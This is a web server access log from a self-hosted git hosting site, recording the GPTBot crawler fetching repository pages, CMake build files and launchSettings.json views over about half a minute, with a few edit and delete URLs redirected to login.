"/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:24:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/build.ninja?display=source" [Client 74.7.227.38] [Length 16435] [Gzip 5.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:18:24:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:24:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11127] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:24:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11126] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:18:24:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:24:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 74.7.227.38] [Length 11674] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties" +[17/Feb/2026:18:24:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" +[17/Feb/2026:18:24:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9953] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" +[17/Feb/2026:18:24:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 33302] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:24:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11614] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:24:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11617] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:24:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 14795] [Gzip 5.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:24:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 33294] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:24:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11615] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11614] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:24:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 14821] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:24:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" +[17/Feb/2026:18:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/TestService/Properties/launchSettings.json" +[17/Feb/2026:18:24:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" +[17/Feb/2026:18:24:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/TestService/Properties/launchSettings.json" +[17/Feb/2026:18:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 74.7.227.38] [Length 9834] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" +[17/Feb/2026:18:24:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json?display=source" [Client 74.7.227.38] [Length 11689] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" +[17/Feb/2026:18:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json?display=rendered" [Client 74.7.227.38] [Length 11187] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" +[17/Feb/2026:18:24:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 74.7.227.38] [Length 10985] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" +[17/Feb/2026:18:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 74.7.227.38] [Length 267] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" +[17/Feb/2026:18:25:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 74.7.227.38] [Length 957] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" +[17/Feb/2026:18:25:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 2023] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:18:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:25:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11583] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10782] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 2023] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" +[17/Feb/2026:18:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 33295] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11614] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 33298] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:25:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" +[17/Feb/2026:18:25:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" +[17/Feb/2026:18:25:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/Properties/launchSettings.json" +[17/Feb/2026:18:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/Properties/launchSettings.json" +[17/Feb/2026:18:25:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11615] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11612] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:25:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 20172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:18:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10778] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:25:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 14822] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:25:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11586] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 20172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:18:25:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 20172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:18:25:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:25:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 20172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:18:25:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr 